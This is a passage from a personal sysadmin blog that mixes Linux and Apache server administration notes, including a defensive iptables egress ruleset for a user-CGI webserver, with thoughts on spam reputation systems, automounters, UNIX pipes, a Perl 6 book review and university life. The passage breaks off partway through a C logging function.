    So what, exactly, has the...

    So what, exactly, has the White House got against people archiving their pages about Iraq?

    Quoting from http://whitehouse.gov/robots.txt:

    Disallow:       /vicepresident/vpphotoessay/cheneyalumnifield/iraq
    Disallow:       /vicepresident/vpphotoessay/cheneyalumnifield/text
    Disallow:       /vicepresident/vpphotoessay/iraq
    Disallow:       /vicepresident/vpphotoessay/part1/iraq
    Disallow:       /vicepresident/vpphotoessay/part1/text
    Disallow:       /vicepresident/vpphotoessay/part2/iraq
    Disallow:       /vicepresident/vpphotoessay/part2/text

    It goes on for a long time like that.
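
    To see what those rules mean for a crawler, here is a short sketch using Python's standard urllib.robotparser. It assumes the rules sit under a "User-agent: *" line, which the excerpt above doesn't show; the allowed helper is made up for illustration.

```python
from urllib.robotparser import RobotFileParser

# The quoted rules, with an assumed "User-agent: *" line in front of them.
EXCERPT = """\
User-agent: *
Disallow:       /vicepresident/vpphotoessay/cheneyalumnifield/iraq
Disallow:       /vicepresident/vpphotoessay/cheneyalumnifield/text
Disallow:       /vicepresident/vpphotoessay/iraq
Disallow:       /vicepresident/vpphotoessay/part1/iraq
Disallow:       /vicepresident/vpphotoessay/part1/text
Disallow:       /vicepresident/vpphotoessay/part2/iraq
Disallow:       /vicepresident/vpphotoessay/part2/text
"""


def allowed(path, robots_txt=EXCERPT, agent="archiver"):
    """Would a well-behaved crawler be allowed to fetch this path?"""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(agent, "http://whitehouse.gov" + path)


if __name__ == "__main__":
    print(allowed("/vicepresident/vpphotoessay/iraq"))   # a blocked prefix
    print(allowed("/vicepresident/"))                    # not covered
```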

    Just written some notes o...

    Just written some notes on the DoC webserver setup. Just so that people can see what goes into a complex Apache setup. And this isn't even factoring in all the research groups and Tomcat servers.

    Look at that timestamp. D...

    Look at that timestamp. Damn timezone differences for the Google Codejam.

    Don't quite think I've made it to the top 250. Read that last sentence in a slightly sarcastic tone. I just hope that I'm not last.

    It seems that not only can I not type very well at this time in the morning, I can't read either.

    Things I found out today

    Tristan pointed out that most of the images linked to below were, in fact, all the same. My mouse skills were obviously on the blink at that moment. The links have now been fixed.

    Linux 2.6 has real per user accounting:

    struct user_struct {
            atomic_t __count;       /* reference count */
            atomic_t processes;     /* How many processes does this user have? */
            atomic_t files;         /* How many open files does this user have? */
    
            /* Hash table maintenance information */
            struct list_head uidhash_list;
            uid_t uid;
    };
    

    This means that process and open file limits apply across the whole system, not per session like they used to. It also means that if a setuid call would cause the resource limit to be exceeded then it returns EAGAIN.
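
    A minimal sketch of what that means for code that switches user, assuming the behaviour described here (later kernels are understood to have moved where this check happens). drop_to_user and nproc_limit are hypothetical helpers, and the setuid argument is only there so the function can be exercised without being root.

```python
import errno
import os
import resource


def nproc_limit():
    """Soft and hard per-user process limits (where RLIMIT_NPROC exists)."""
    return resource.getrlimit(resource.RLIMIT_NPROC)


def drop_to_user(uid, setuid=os.setuid):
    """Switch to uid; return False if that user is at their process limit."""
    try:
        setuid(uid)
    except OSError as err:
        if err.errno == errno.EAGAIN:
            # The target user already has too many processes: back off
            # and retry later rather than carrying on with the old uid.
            return False
        raise
    return True
```

    The important part is checking the return at all: a caller that ignores a failed setuid carries on running with its old privileges.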

    Also, Apache 1.3.28 has a known bug with CGI handling and SuEXEC which means it leaves zombies all over the place (official patch released). Guess how this and the above conspired to bite me today.

    Apache 1.3 cannot proxy SSL requests. But Apache 2 can, and it can cache the results. It also supports SCTP for those who know/care what that is.

    Also, despite fluffing the second question, it looks like I might have made the top 500 cut in the GoogleJam.

    And slashdot has just published this story about how the FTAA treaty is going to ratchet up IP laws again. But for once the UK isn't part of it.

    Another letter to my MP, ...

    Another letter to my MP, this time on software patents.

    God doesn't work. "it puts God to the test - and there are clear instructions in the Bible not to do this" - well designed meme wasn't it? Poor deluded sods.

    Google Code Jam

    Great picture: Found Nemo

    The film is not fantastic, but a good way to spend a couple of hours.

    A while ago Google announced the Google CodeJam which is basically another coding competition. This one is a little different to anything else I've done because it's a sit at home competition. This presents some advantages: it's more comfortable and you get a vim working the way you want. It also means there is a lot of scope for cheating.

    Once you look at the first problem you have 60 minutes to submit solutions. You can only submit once, but they do have a reasonable testing framework.

    The score you get for a problem is based on how long you take to submit it. Once the coding phase (this weekend) is over they go and test the programs and anything that fails a test is discounted.

    The top 500 go on to the next round.

    It's obvious that a single user could in fact be a team of coders working on the problem. It's also quite possible to be many users and to read the questions well ahead of your `time' starting. The latter problem is slightly resolved because there are 10 sets of questions. But that just increases the work needed by a factor of 10 and creating 11 users isn't a lot of work.

    Personally I didn't understand what the hell the second problem was asking and, looking back on it, I still don't. And the second problem is worth 80% of the marks so I've failed this one. Maybe they will run it next year.

    C&G Ball

    In crewing news - the City and Guilds Ball went very well even if I did get home at 7am the following morning and the punters arrived 3 hours before we were expecting them.

    Webserver for User CGI

    Running CGI scripts for users on your webserver is a dangerous game. Not only do users test their runaway fork-bombing scripts but they also install known buggy versions of phpBB and the like and let your webserver get compromised.

    And even if they cannot get root, crackers can use your >1Gbps of bandwidth to turn your poor webserver into the central warez site for the whole of Europe over the weekend. I know. It's happened to us.

    And so, tweetypie is born. The first thing to do is get rid of modphp and force all users to run php via the CGI binary and build Apache with SuEXEC support.

    Users may complain about not having modphp, but just slap them with rack rails until they go away. Then install this patch which sets resource limits on all CGI scripts and configure iptables to block all outgoing non-system packets:

    *filter
    :INPUT ACCEPT [89251:15855936]
    :FORWARD ACCEPT [0:0]
    :OUTPUT ACCEPT [85660:11402157]
    -A OUTPUT -d 146.169.1.1 -p udp -m udp --dport 53 -j ACCEPT 
    -A OUTPUT -d 146.169.1.24 -p udp -m udp --dport 53 -j ACCEPT 
    -A OUTPUT -d 146.169.1.189 -p tcp -m tcp --dport 5432 -j ACCEPT 
    -A OUTPUT -m owner --uid-owner sshd -j ACCEPT 
    -A OUTPUT -m owner --uid-owner wwwnot -j ACCEPT 
    -A OUTPUT -m owner --uid-owner root -j ACCEPT 
    -A OUTPUT -m owner ! --uid-owner root -j DROP 
    COMMIT

    Then set up 2000 bind mounts to work around a race condition in the kernel (you almost certainly don't have the kind of load that would trigger this - so you can ignore it) and voila!

    Simple eh?

    Diebold are making a mess...

    Diebold are making a mess about their memos being published and are C&Ding lots of websites.

    So go mirror them

    Busy..

    Within two weeks...

    Server | Function | Fuckup
    Heron | Primary webserver | Well, this was an emergency move after a hardware failure of the old server. Unfortunately, we forgot some stuff and someone rooted it via phpBB and sudo. So another emergency move (3 hours last Sunday night) onto a new server which we will enable CGI on when we feel ready. (It's roughly the same as running a public access shell server).
    Chukar | Online Backup server | RAID controller decided it was a good day to die. Emergency move to an unused server promptly killed it and after a second move it seems ok.
    Faya | Research group server | Multiple disk failure. Scrape remains off and replace.
    Parakeet | Syslog and secure console server | Primary disk failure. Scrape remains off and replace.

    And Merlin (major fileserver) froze solid today and needed a SysRq-B. I think we should ask the physics dept what experiments they started doing about two weeks ago.

    On top of that, every spare moment has been spent running Fresher's Week at the union. [photos]

    Well, it's a new year at ...

    Well, it's a new year at Imperial and that means a whole new lot of freshers and lots of people saying "God. I hope we weren't that clueless and dumb last year" (us) and "I feel ill" (them, drunk).

    Hopefully photos of the freshers welcoming party will be up soon. That took the last 3 days of setting up but seemed to go down pretty well. The rest of the week involves shuffling equipment around for all the other fresher events as they happen.

    Early this morning I actually managed to get to sleep on a sofa, on a stage, in the middle of the concert hall which was empty except for lots of intelligent lights, a really good drum-n-bass DJ and two huge speaker stacks giving 10kW's of sonic goodness.

    Hmm, what else.. oh yea; Practical Cryptography is good. All crypto coders should probably have it on their shelves. I've got a 7/2 split of courses over the next two terms (so I'm going to get buggered silly this term and be going to random other lectures again next term for something to do).

    Thanks to Polly for point...

    Thanks to Polly for pointing out that I'm in New Scientist again.

    Just written a new letter...

    Just written a new letter to my MP about ID cards in the UK.

    Ok, so I haven't posted a...

    Ok, so I haven't posted anything here for quite a while and I'm still feeling too lazy to write anything so I'm going to post an edited version of an email I've just sent because it saves me doing any work.

    I've just got ADSL working in my new flat and the ADSL modem is so a Linux box with a silly menu system on the front. But it works, even if I'm a little afraid that the 50:1 contention is going to bite once all the students in this area manage to get it going.

    Term starts at the end of next week (or this week, depending on when you consider the week to start) and so I've quite a lot of rigging to do before Saturday. (That's rigging in the sense of setting up stuff like this.)

    (Typing this over ssh while emerging. I think I need to look at the QoS settings of this modem.)

    I'm also the union server admin (FreeBSD) as of Wednesday and every society on Earth (seemingly) has suddenly realised that they need to update their webpage for the new year and can anyone remember the password? Can they buggery.

    At least I'm giving them random passwords this year without the ability to change them, so there's no chance that they'll forget to write them down somewhere really stupid and obvious, thus saving me this problem next year.

    And are there any new phd or staff boxes installed and ready? And are we really going to have the 25 new Apple dual-proc G5s (which arrived yesterday, weeks late) done and deployed by the end of the week? And am I going to have to install my automounter on every box that I actually want to use because autofs and amd are such piles of crap? And do I really think that just because my summer job ended yesterday that I'm not going to be pulling 12 hour days all next week in the department and at the union to get things ready?

    Fun, fun, fun! :)

    Well, updates to the Veri...

    Well, updates to the Verisign countermeasures page are continuing apace. Thankfully it seems that ICANN and IAB are now applying political pressure to the problem.

    New release of Bane. Nothing but a few bug fixes, but it seems stable (been running for 13 days here at least).

    Also, I've released Conserv and Figures source code. If anyone actually wants to use either of them, just drop me an email (link at the top of the page) and it might motivate me to write some actual documentation

    OpenSSH exploit

    OpenSSH exploit

    Just written a program to...

    Just written a program to fix Verisign dumbness here

    Update: That page also contains patches for BIND and djbdns as well now (those are not my code, however)

    The missing files problem...

    The missing files problem turned out to be a Mandrake rc.sysinit fault. The moral of the story is fsck has a "reboot computer" return code. Respect it.
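
    For reference, fsck(8) documents its exit code as a sum of flag values, with 2 meaning "system should be rebooted". A minimal sketch of how an init script helper might test for it; the macro and function names are made up for illustration and are not taken from any rc.sysinit:

```c
/* Flag values as documented in fsck(8); the names are hypothetical. */
#define FSCK_ERRORS_CORRECTED    1
#define FSCK_REBOOT_NEEDED       2
#define FSCK_ERRORS_UNCORRECTED  4

/* Returns 1 if fsck asked for a reboot, 0 otherwise. */
int
fsck_wants_reboot (int exit_code)
{
        return (exit_code & FSCK_REBOOT_NEEDED) != 0;
}

/* Returns 1 if fsck left errors it could not fix, 0 otherwise. */
int
fsck_left_errors (int exit_code)
{
        return (exit_code & FSCK_ERRORS_UNCORRECTED) != 0;
}
```

    An exit code of 3 (errors corrected, reboot needed) should therefore stop the boot and reboot rather than carry on mounting.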

    And this is a little bit freaky. (from JWZ):

    Aoccdrnig to rscheearch at Cmabrigde Uinervtisy, it deosn't mttaer in waht oredr the ltteers in a wrod are, the olny iprmoetnt tihng is taht the frist and lsat ltteer be at the rghit pclae. The rset can be a total mses and you can sitll raed it wouthit a porbelm. Tihs is bcuseae the huamn mnid deos not raed ervey lteter by istlef, but the wrod as a wlohe.

    New Chicane album out tomorrow. I've already heard a big part of it at their live concert and this will be the first album in a long while that I've actually been looking forward to.

    RIP amendment is back

    RIP amendment is back

    I've got permission to public domain everything that I've coded over the summer, which I shall be doing soon(ish). But for the moment I've got ext3 filesystems that are losing files after a SysRq-Unmount. And I'm not talking about files that were open at the time, I'm talking about gcc and core libraries. So I need to find out what is causing that.

    Intel 8086:24d5 Soundcards

    If you have one of these, upgrade alsa-libs to 0.9.6 and get the CVS versions of both alsa-kernel and alsa-drivers and put kernel in drivers as a subdirectory. Build everything and then it will pretty much work, but only in OSS compatibility mode.

    Flat panel color separation

    If you get color separation on your flat panel when using programs that do subpixel antialiasing (such as this Mozilla build) then put something like this into /etc/fonts/fonts.conf

    <match target="font">
    	<edit name="rgba" mode="assign"><const>gbr</const></edit>
    </match>
    

    and reorder the gbr string until it works (or set it to rrr to disable).

    Viewing manpages in Vim

    Thanks to Gentoo forums you can view your manpages in Vim, if you like:

    export MANPAGER="col -b | view -c 'set ft=man nomod nolist' -"

    I've put up a new page fo...

    I've put up a new page for Seagull's Bane. The new release only has better code comments and a tiny fix.

    You can also see the documentation for another project of mine here. I hope to release the code for this and NSANet soon.

    Dealing with spam

    Personally, all the spam I get is filtered by procmail without any fancy statistical magic, or indeed, without looking at the body of the message at all. So if everyone could be like me the spam problem would go away.

    But it seems that spam is a big problem for other people, and whilst I don't really worry about other people's problems very much when I have such a wide choice myself, spam filtering provides a nice thought exercise for a while. Not to mention a chance to lever in a few better ways of doing things.

    From a technical point of view I would start a company that runs sweatshops filtering spam by hand. The workers would have to have fair language skills, but English is pretty commonplace and there are enough sweatshop labourers, so I keep getting told.

    However, I have a few non-technical problems with running sweatshops and it doesn't involve very much code, so probably isn't much fun.

    AMTP is a small extension to the SMTP protocol that makes TLS mandatory and sets an evil bit (more or less) for each message. If the sending host doesn't correctly set the evil bit then you have a CA issued identity to lynch.

    This is basically a 2-level trust tree. Everyone trusts the elite CAs and they trust all the ISPs in the world and so on. The major problem with this being that a CA issued identity costs, lots. From a management point of view this might seem like a very good idea. Get all those geeks off the Internet and then we can get down to making money off it ... somehow.

    But it's making email sending exclusive (because it's expensive) and this is our end-to-end network goddammit.

    There has been plenty of good work done by the reputation people about this sort of thing. But generally they are considering how to deal with reputation when you hold the whole graph. (Though anyone should feel free to point me at a paper which solves these issues). Dealing with reputation when one can only see a couple of small areas of the graph is a whole different matter.

    Consider a simple system where a node (person) is free to set up a directed arc (reputation certificate) to any other node. Each arc has a float between 0 and 1 which indicates how confident the source is that the destination will not send spam. Also assume that a node will accept a message if the sender can show a path from the target to the sender such that the product of all the arc weights is greater than 0.1.
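
    To make the acceptance rule concrete, here is a minimal sketch that assumes the whole graph is available as a small adjacency matrix (exactly the assumption that gets questioned next). The function names, the matrix layout and the relaxation approach are illustrative choices, not part of any real system:

```c
#include <stddef.h>

/* The acceptance threshold from the text. */
#define TRUST_THRESHOLD 0.1

/*
 * Returns the largest product of arc weights over any path from src to
 * dst, or 0.0 if there is no path. w is an n*n row-major matrix where
 * w[i * n + j] is the weight of the arc i -> j (0.0 meaning "no arc").
 * best is caller-supplied scratch space for n doubles.
 */
double
best_path_trust (size_t n, const double *w, size_t src, size_t dst,
                 double *best)
{
        size_t round, i, j;

        for (i = 0; i < n; i++)
                best[i] = 0.0;
        best[src] = 1.0;        /* the empty path has product 1 */

        /* Weights never exceed 1, so a best path has at most n-1 arcs
         * and n-1 rounds of relaxation are enough. */
        for (round = 0; round + 1 < n; round++) {
                for (i = 0; i < n; i++) {
                        for (j = 0; j < n; j++) {
                                double via = best[i] * w[i * n + j];
                                if (via > best[j])
                                        best[j] = via;
                        }
                }
        }
        return best[dst];
}

/* Non-zero if target would accept a message from sender. */
int
accepts_message (size_t n, const double *w, size_t target, size_t sender,
                 double *scratch)
{
        return best_path_trust (n, w, target, sender, scratch)
                > TRUST_THRESHOLD;
}
```

    With arcs 0->1 (0.9), 1->2 (0.5) and 0->2 (0.05), node 0 accepts mail from node 2 via node 1 (0.45) even though the direct arc alone would fall below the threshold.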

    Without a good knowledge of the graph, the sender isn't going to be able to find such a path, even if it exists. Assuming that there is a way to walk the graph, it's going to take a connection-request-reply to lots of different servers to get the information. (Because we wouldn't have it on one central server as that would be Bad).

    See the aside below in which I contradict myself after you have read the rest.

    However, most of the time I'm exchanging email with people that I have a good contact with. Messages which would require many hops of the trust graph are quite rare.

    Thus it would be perfectly possible for search servers to hold much of the graph in memory. There wouldn't be a single central search server (as that would be Bad), but there wouldn't need to be as the server need not be trusted as it cannot lie. Possibly that would be enough to make the system work.

    Issues that I'm not going to think about till the morning... negative certs, caching issues, the problem of time delay if a trusted source goes 'bad' (which are all rooted in the same issue).

    Aside

    Above, I state that searching the trust network wouldn't work. But it occurs to me that it would be fairly simple to find a path quite efficiently.

    The trust graph is going to have a power law distribution. I don't know why, but I would be very surprised if it didn't. So, starting from two points A and B, to find a path between them walk up the orders until you hit a common meeting point at a high order node.

    Walking up from B assumes that much of the time if C trusts D, then D trusts C. Because you actually want to find a path, in the end, that goes down to B. This assumption makes the graph look `symmetricish' and so the trick might produce a path pretty quickly. Unfortunately, the symmetric assumption falls down for the high order nodes.

    You can see some of the d...

    You can see some of the documentation for DoC management network here

    I've moved and have no inet link in the new place (yet) so I'm not going to be writing too much.

    The future of money: priv...

    The future of money: private complementary currencies

    Seagull's Bane

    Well, here's the promised public release of Seagull's Bane. A simple Linux automounter which doesn't do lots of silly crap (amd) that most people don't want and doesn't get trivially upset (autofs and amd).

    It's Creative Commons public domain.

    I'm going to switch to using it on my box at work, so I'll probably release a few new versions over a few days with fixes :).

    Oh, and email is working again from Freenet's nice new server.

    Email fucked until at lea...

    Email fucked until at least late Tuesday. agl02 at doc.ic.ac.uk should still work.

    xMule Mirror up

    here (via BoingBoing)

    Apparently I have been subpoenad, personally, on 8-17-2003 by an as-yet unknown entity under the DMCA clause, because of xmule, when it went on to gov'ment radar w/ the e-matters.de alert :P The subpoena lasts, suposedly, until Dec 6, when i must stand infrotn of a federal appellet court

    Why Pipes Suck

    I'm going to have to do something about this problem at some point, but for the moment I'm going to settle with describing it.

    I'm considering the design of some status monitoring for the servers in DoC. At the moment we have some pretty complex triggers set up on our admin Postgres server that allow you to insert values into a table and have per-minute and per-hour tables filled out automatically with the min, max and average. This is all very nice, but very slow. Postgres just can't handle it so we need something different.

    We want to be able to set alarms on values over any averaging time and we want to record the per-hour, per-minute, per-day etc data for long term analysis of server load and so forth.
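
    As a rough sketch of the bookkeeping this needs outside the database, each (name, window) pair could keep a running summary like the one below. The struct and function names are hypothetical, and how windows are rotated and stored is left out:

```c
/* Hypothetical running summary for one value over one averaging window. */
struct bucket {
        double          min, max, sum;
        unsigned long   count;
};

/* Empties the bucket at the start of a new window. */
void
bucket_reset (struct bucket *b)
{
        b->min = b->max = b->sum = 0.0;
        b->count = 0;
}

/* Folds one sample into the window. */
void
bucket_add (struct bucket *b, double v)
{
        if (b->count == 0 || v < b->min)
                b->min = v;
        if (b->count == 0 || v > b->max)
                b->max = v;
        b->sum += v;
        b->count++;
}

/* Average of the samples seen so far, or 0.0 for an empty window. */
double
bucket_average (const struct bucket *b)
{
        return b->count ? b->sum / (double) b->count : 0.0;
}

/* Non-zero if the window's average exceeds the alarm limit. */
int
bucket_alarm (const struct bucket *b, double limit)
{
        return b->count != 0 && bucket_average (b) > limit;
}
```

    One bucket per window length (minute, hour, day) is reset when its window closes, after its min, max and average have been written out for long term analysis.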

    I've written a small C program that parses /proc/stat and pulls useful information out of it. Every bit of information is a name-value pair like servername.load, 2.3. I don't want to have to bother with authenticating raw TCP connections so I'm going to have the status server ssh out and invoke the monitoring program to trusted servers.
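
    The monitoring program itself isn't shown here, so the following is only a sketch of the general shape: it parses the aggregate "cpu" line of /proc/stat (user, nice, system and idle tick counts) and formats a name-value pair in the style above. The struct, the function names and the cpu_idle key are assumptions for illustration:

```c
#include <stdio.h>
#include <string.h>

/* Tick counters from the first four fields of the "cpu" line. */
struct cpu_ticks {
        unsigned long   user, nice, system, idle;
};

/* Parses the aggregate "cpu" line. Returns 0 on success, -1 otherwise.
 * Per-CPU lines such as "cpu0 ..." are rejected. */
int
parse_cpu_line (const char *line, struct cpu_ticks *out)
{
        if (strncmp (line, "cpu ", 4) != 0)
                return -1;
        if (sscanf (line + 4, "%lu %lu %lu %lu", &out->user, &out->nice,
                    &out->system, &out->idle) != 4)
                return -1;
        return 0;
}

/* Writes "server.key, value" into buf. Returns 0, or -1 if it won't fit. */
int
format_pair (char *buf, size_t len, const char *server, const char *key,
             unsigned long value)
{
        int n = snprintf (buf, len, "%s.%s, %lu", server, key, value);

        return (n < 0 || (size_t) n >= len) ? -1 : 0;
}
```

    A real collector would read the line from /proc/stat with fgets in a loop and print one pair per counter on stdout for ssh to carry back.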

    That's all just background.

    Now I have lots of incoming streams from the servers and I need to demultiplex them into a stream with all the data. I'm a good UNIX programmer so I want everything to be as modular as possible. Let's say that I collect the data with a command line like: ssh -t -t -x ... servername /usr/bin/monitor_program | domcat /var/status_data (domcat is like netcat, but for UNIX domain sockets). Now I need a program that can merge the incoming streams and allow people to connect and receive the total stream.

    If I was being a poor UNIX programmer I would pass a couple of TCP port numbers to this program. It would take all the input from anyone who connected to the first port, merge it and throw it out to everyone connected to the second port.

    But the decision to use TCP shouldn't be ingrained (authentication nightmare), nor should the splitting of streams (it's just data). All this program should do is use its protocol specific knowledge to merge streams into one. Thankfully, I already have a program called conguardian that just passes file descriptors to the stdin of its child and accepts (and authenticates) connections from a named UNIX domain socket. So, the command line is looking like: conguardian /var/status-data merger_program.

    But how do we get the data out of it? We write a program called splitter that just takes an input stream from stdin and copies it to everyone who connects. Thankfully, conguardian already abstracts the business of accepting and authenticating connections. So we say conguardian /var/status-data merger_program | conguardian /var/status-data-out splitter.

    Oops! conguardian passes file descriptors in via stdin and we are trying to pipe data into stdin. How well do you know your shell syntax? Can you even pipe the output of one program into a numbered fd input of another? Are you going to have a headache by the time you have finished?

    I'm always finding that I can't connect programs together with anything like the flexibility I want. How do you do bidirectional pipes? You make the second program's name and arguments into arguments of the first, and write special fork handling code in the first. And if you want two bidirectional inputs to the second program? Oh dear.

    (The above may be clearer if I include the conguardian manpage)

    CONGUARDIAN(1)                                     CONGUARDIAN(1)
    
    
    NAME
           conguardian - Access control for UNIX domain sockets
    
    SYNOPSIS
           conguardian <path to socket> <child process> [<child argu
           ments>]...
    
    DESCRIPTION
           conguardian attempts to unlink the given socket path if it
           exists and is a socket. If it is not a socket then it will
           fail to bind to it and give up.
    
           conguardian accepts connections on the  given  socket  and
           checks  the  UID of the other end against an internal list
           of allowed usernames. UID 0  is  always  allowed  and  the
           internal  list is initially empty. If not on the list, the
           connection is terminated.
    
           If the client is allowed and sends an  ASCII  NUL  as  the
           first  byte,  the  connection  is passed to the child over
           UNIX domain DGRAM socket on stdin. If the client  sends  a
           0x01  byte and is root, it can upload a new username list.
    
    ENVIRONMENT
           IDENT given in all syslog messages
    
    AUTHOR
           Adam Langley <agl@imperialviolet.org>
                                                       CONGUARDIAN(1)
    
    Perl 6 Essentials

    As O'Reilly books go, this is a pretty small one. Its list price ($25) is more than I would value it at, but I got it from the library.

    The book is in three sections: an introduction to Perl 6, an introduction to Parrot and a primer in Parrot assembly. The last one is highly skimmable unless you are actually programming in Parrot assembly (in which case you probably already have a far better knowledge of Parrot).

    Now Perl 6 looks quite cool, it fixes a couple of things that I don't like about Perl 5. Assigning a hash or array to a scalar produces a reference to it...

    Interlude: I'm half watching a program about asteroid impacts and I've just seen a (poor) computer graphics simulation of an impact right on Imperial College, of all the places in the world. I'm a little gobsmacked...

    ... which makes a lot more sense than assigning the phase of the moon or something. And the rules system (even more complex regular expressions) looks very powerful and a little more sane than Perl 5 regexps.

    Also, we have an intelligent equality (~~) operator, which looks neat and leads to a nice switch operator (given). But I'm a little concerned about the number of different things it does depending on the types of its arguments, but that's very Perlish. And the book lists 12 different contexts in which anything can be evaluated.

    Less cosmetically, Perl 6 might gain continuation and coroutine support from Parrot. I don't know if Perl 6 will actually expose these, but Parrot can do them. And Parrot looks like it could really do wonders for open source scripting languages. It looks fast, and has been designed to support Perl 6, Ruby, Python, Scheme and others. Intercalling between them might allow us to get rid of some of the terrible C glue code that we have at the moment.

    One thing that does worry me about Parrot is that its basic integer type is a signed 32-bit. If you want anything else you have to use PMCs, which is a vtable based data type that allows for arrays and hashes and so forth, and is much slower. Now there are many applications for which 31 bits isn't enough. File offsets are obvious, but how about UID and device numbers? Both of these are looking like they are going to be 32-bit unsigned ints. You can fit this into a Parrot signed int, but it's going to cause huge headaches.
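
    The headache is easy to show in plain C. This sketch has nothing Parrot-specific in it and the function names are invented: it just reinterprets the bits of an unsigned 32-bit value as a signed one, which is what squeezing a large UID into a signed 32-bit register amounts to.

```c
#include <stdint.h>
#include <string.h>

/* Non-zero if v survives a trip through a signed 32-bit integer with
 * its value intact, i.e. it needs no more than 31 bits. */
int
fits_in_signed32 (uint32_t v)
{
        return v <= (uint32_t) INT32_MAX;
}

/* Reinterprets the same 32 bits as a signed value. memcpy avoids relying
 * on implementation-defined conversion of out-of-range values. */
int32_t
reinterpret_as_signed32 (uint32_t v)
{
        int32_t s;

        memcpy (&s, &v, sizeof (s));
        return s;
}
```

    A UID of 4294967294 comes out as -2, so every comparison, sort and printout of such a value needs to know that it is really unsigned.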

    UPSs

    I've been dealing with APC UPSs a fair bit this week. A quick Google search will turn up the serial protocol that they use and it's really quite nice. A lot of devices (APC MasterSwitches for one) have a fancy vt100 menu interface which is totally unusable for an automated system. The UPSs, on the other hand, have a simple byte code protocol and hopefully I'll have the servers shutting down neatly in a power failure. Software like that already exists but it's generally far too simple minded. We have many servers on any given UPS and some servers on several.

    APC do lose points for their serial cables however. APC supply (for quite a price) so called 'smart cables' that are specially pinned out and nothing else uses the same interface. Thankfully, after looking at diagrams for about an hour I stuck 3 pins into a D9->RJ45 converter and it worked first time!

    Automounters

    (IV should stop falling over quite as often now. It looks like there's a bug in the sunrpc code in 2.4.20 kernels. The maintainer doesn't know why, but 2.4.21 fixed it.)

    I'm rewriting a replacement user-land automounting daemon at the moment which I'll post here when it's kindof ready. The two current solutions (autofs and amd) are either too fragile (autofs) or too bloated and too fragile (amd). Sadly enough, amd came from Imperial CSG originally and has turned into a monster over time.

    I'm a little limited in what I can do on my laptop however (I'm at home for the weekend) because it only has GCC 2.95 which lacks the nice C99 features that GCC3 supports. (Actually I'm a little hazy on which are C99 features and which are GCC extensions. But since the automounter is only ever going to run on Linux they are pretty much the same).

    Lexical functions and C++ style variable decl placement are an absolute wonder (though I have found a couple of placement gotchas which might be because I was using a CVS GCC). One thing that I'm not so sure about is run-time array sizes.

    This allows the size value of an array to be a run-time variable. I suppose this (with the more flexible decl placement) is a `cleaner' way of doing alloca. But it was certainly a surprise when I forgot a sizeof, thus making the array size run-time and (so it happened) negative. It certainly scared the crap out of gdb.
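
    A small sketch of the feature, with the kind of guard that would have caught a negative size. The function and its upper limit are made up for illustration; the point is only that the array length is an ordinary run-time value, so it needs the same checking as an alloca argument:

```c
/* Hypothetical cap on how much stack one call is allowed to use. */
#define MAX_ELEMENTS 1024

/* Sums the first n squares using a run-time sized (C99) array.
 * Returns -1 if n is not a sane array size. */
long
sum_of_squares (int n)
{
        if (n <= 0 || n > MAX_ELEMENTS)
                return -1;      /* a negative or zero length is undefined */

        long    squares[n];     /* size fixed when execution reaches here */
        long    total = 0;

        for (int i = 0; i < n; i++)
                squares[i] = (long) (i + 1) * (i + 1);
        for (int i = 0; i < n; i++)
                total += squares[i];
        return total;
}
```

    Without the check, a negative n compiles without complaint and fails only at run time, typically with a badly adjusted stack pointer.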

    And speaking of gdb, it doesn't seem to understand much that GCC3 turns out. I guess I need to start CVS chasing gdb again (like I did when pthreads support was still going in).

    2.6 Kernels

    I got 2.6.0-test3 to boot. This is the first 2.5/2.6 kernel that has ever managed to boot on my system. Personally it doesn't seem too obscure to me, but the AIC7xxx and megaraid cards have always freaked out a 2.5/2.6 kernel until now. (Which was kindof a bummer since the only root device I had left without those was a floppy disk).

    I'm not sure if it's really that much quicker than a fully patched (preempt etc) 2.4, but at least it saves me from patching every kernel version with XFS. The new sysfs seems a little weird. I guess it's still a -test quality release, but different devices don't seem to agree on how to format things like device numbers and the like.

    Still, udev thinks it can simulate devfs in userspace via sysfs and /sbin/hotplug, which is quite neat. I guess I'll need a `real' /dev directory again however, since you can't mount udev at boot like you can with devfs.

    Also, I want disklabel support added to grub and the kernel. You can quite happily put UUID= and LABEL= tags in /etc/fstab, but you still need to give `real' device numbers to the kernel and grub. Worse yet, the kernel device numbers depend on the order of Linux drivers loading and grub's depend on the order of BIOSes loading. Under 2.4 there is pretty much no good way (that I know of) to get grub device numbers.

    I think that the kernel people would say that support for labelled roots should go in an initrd. And I would agree with them if I didn't hate initrd's so much for all the pain they have caused me. I guess I should hack linux/init/*.c.

    I should also post my grub -R patch here (one shot reboots).

    Blaster

    The BBC are reporting (lack of inet connection - no link at the moment) that Microsoft has `neutralised' the MS Blaster worm. What they have actually done is move the windowsupdate.com domain so that they don't get flooded off the face of the planet which would have been just reward.

    It's still crashing unpatched systems left right and centre because it's so badly written. Once again, the world has been saved by the abject cluelessness of black-hat-wannabe-kiddies.

    And from the world of less clueless coloured-hat people; the latest Phrack is out. Phrack is very much worth reading. It has a fair few wordz with too many z's on the end, but the actual content is of a very high quality. I certainly want to play with the ELFsh program.

    Oh, another item for the wish list, code that will take a dynamic ELF and make it static.

    And I guess there are a fair few computers on the Niagara Mohawk grid that haven't been patched yet.

    (I shouldn't smile about that actually. The UK has deregulated the grid recently too and investment has fallen to 0. Sure, prices are lower, but people aren't asking where all that money came from yet.)

    Disk. Who needs that?

    tmpfs is a cool thing. You almost certainly have it built in if you're running a 2.[456] kernel. I have a box sitting in the DoC machine room that, at rc.sysinit time, copies a Gentoo stage3 into a tmpfs and chroots into it. It has no swap enabled so you can (and I did) pull the SCSI ribbon off the motherboard (live) and the machine doesn't even blink.

    It will be logging to the disk at some point and all those multilog and syslog-ng processes will drop into disk wait, but that shouldn't affect the main function of the box. My main worry is that syslog-ng creates /dev/log as a UNIX SOCK_STREAM (I have yet to test this) in which case some stuff that syslogs will lock up too.

    My code expects syslog to block and will carry on working (dropping log messages as needed), but I'm not sure about sshd and the like. The solution is to make /dev/log a SOCK_DGRAM in the syslog-ng source code I guess.
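
    The drop-rather-than-block behaviour can be sketched like this, assuming the log socket really is a SOCK_DGRAM one. The function name is hypothetical and this is not the code referred to above; it sends one datagram with MSG_DONTWAIT and reports failure instead of waiting for a stuck log daemon:

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/un.h>
#include <unistd.h>

/* Tries to send msg to the datagram socket at path without blocking.
 * Returns 0 if the message was handed over, -1 if it was dropped. */
int
try_log (const char *path, const char *msg)
{
        struct sockaddr_un      addr;
        ssize_t                 sent;
        int                     fd;
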